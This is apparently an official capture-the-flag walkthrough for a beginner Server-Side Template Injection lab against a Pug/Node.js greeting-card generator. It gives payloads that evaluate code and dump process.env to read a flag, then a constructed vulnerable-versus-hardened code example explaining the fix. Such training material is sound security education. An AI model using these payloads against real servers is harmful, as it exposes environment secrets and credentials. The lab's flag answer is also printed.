HACKR.GG
hackr.gg — Official Walkthrough
Confidential · Educational Use Only

CardCraft — SSTI Intro

SSTI · Server-Side Template Injection
Difficulty: Beginner
Vuln class: Server-Side Template Injection
Steps: 3
// Objective
Inject template syntax into the greeting card generator to confirm SSTI and read the flag from the environment.
// Tools required
Browser, Burp Suite, curl
// Step-by-step walkthrough
1. Confirm SSTI with a math expression
The greeting card generator accepts the card's message in the "template" field of a JSON POST to /render and hands that string to the template engine as template source, not as data. Inject a template expression and check whether the server evaluates it.
Command / Input
POST /render {"template":"= 7*7"}
Output
49
If the server returns 49 rather than echoing the literal "= 7*7", the field is being evaluated server-side and SSTI is confirmed. The "= expr" form is Pug's buffered-code syntax, so a positive result here also identifies the engine as Pug on Node.js. Send a second, different expression to rule out a cached or coincidental response before moving on.
2. Read environment variables
Because the engine is Pug on Node.js, the template expression runs as JavaScript in the server process and can reach the Node global process object, so process.env exposes the server's environment. This payload is Node-specific: Jinja2 (Python) or Twig (PHP) would evaluate "{{7*7}}" instead and have no process.env, so the environment would have to be reached through that engine's own objects.
Command / Input
POST /render {"template":"= process.env"}
Output
{NODE_ENV: 'production', FLAG: '...', PORT: '3000'}
3. Extract the flag
Read just the FLAG environment variable.
Command / Input
POST /render {"template":"= process.env.FLAG"}
Output
HackrGG{sst1_t3mpl4t3_1nj3ct3d}
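The three steps above all rest on one root cause: the "template" field is compiled as template source instead of being passed to a fixed template as data. What follows is an added example, not CardCraft's code and not the pug package: a small Pug-like compiler, constructed for illustration, that supports only "= expr" buffered code and "#{expr}" interpolation, shown with the vulnerable handler beside a hardened one. The flag value it sets is a constructed placeholder so the example runs offline.

```javascript
// Added example, not CardCraft's code and not the pug package. A minimal
// Pug-like engine, constructed to show why handing user input to the template
// compiler is SSTI and why passing it as a local is not.
// Supported subset: a line starting with "= " is buffered code whose value is
// evaluated and output; any other line is text with #{expr} interpolation.
// Both outputs are HTML-escaped, as in Pug. Escaping does not stop the
// injection, because the expression has already run by the time it is escaped.

function escapeHtml(value) {
  return String(value).replace(/[&<>"']/g, (c) =>
    ({ '&': '&amp;', '<': '&lt;', '>': '&gt;', '"': '&quot;', "'": '&#39;' }[c]));
}

// Compile template source to a JS function. Like Pug, this uses new Function,
// so expressions inside the template run with access to Node globals such as
// process; that is exactly what "= process.env.FLAG" relies on.
function compileTemplate(src) {
  const body = [];
  for (const line of src.split('\n')) {
    if (line.startsWith('= ')) {
      // Buffered code: the rest of the line is JavaScript, evaluated at render time.
      body.push(`out.push(escapeHtml((${line.slice(2)})));`);
    } else {
      // Text line: only #{expr} segments are evaluated; the rest is a literal.
      const parts = [];
      let last = 0;
      for (const m of line.matchAll(/#\{([^}]*)\}/g)) {
        parts.push(JSON.stringify(line.slice(last, m.index)));
        parts.push(`escapeHtml((${m[1]}))`);
        last = m.index + m[0].length;
      }
      parts.push(JSON.stringify(line.slice(last)));
      body.push(`out.push(${parts.join(' + ')});`);
    }
  }
  // 'with (locals)' exposes template data as bare identifiers, the way Pug
  // exposes locals; any name not in locals resolves to the global scope.
  return new Function('locals', 'escapeHtml',
    `with (locals) { const out = []; ${body.join('\n')} return out.join('\\n'); }`);
}

// Constructed placeholder so the example runs offline; a real target has its own value.
process.env.FLAG = process.env.FLAG || 'HackrGG{constructed_demo_flag}';

// VULNERABLE: the request's "template" field is compiled as template source.
function renderCardVulnerable(body) {
  return compileTemplate(body.template)({ name: 'friend' }, escapeHtml);
}

// HARDENED: the template is a fixed string under the developer's control; the
// user's message only ever enters the compiled function as data in locals, so
// "= 7*7" or "#{process.env.FLAG}" in the message comes back as literal text.
const CARD_TEMPLATE = 'Dear #{name},\n#{message}';
const renderCard = compileTemplate(CARD_TEMPLATE);
function renderCardSafe(body) {
  return renderCard({ name: 'friend', message: String(body.message ?? '') }, escapeHtml);
}

console.log(renderCardVulnerable({ template: '= 7*7' }));              // 49
console.log(renderCardVulnerable({ template: '= process.env.FLAG' })); // flag value
console.log(renderCardSafe({ message: '= 7*7' }));                     // Dear friend,\n= 7*7
```

The same split applies to the real engine: pug.compile or pug.render with a fixed template file plus a locals object is the safe shape, while calling them on a string assembled from request data is the CardCraft bug.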
// Flag
Flag value: HackrGG{sst1_t3mpl4t3_1nj3ct3d}
Location: the FLAG environment variable, read via the evaluated template expression in step 3.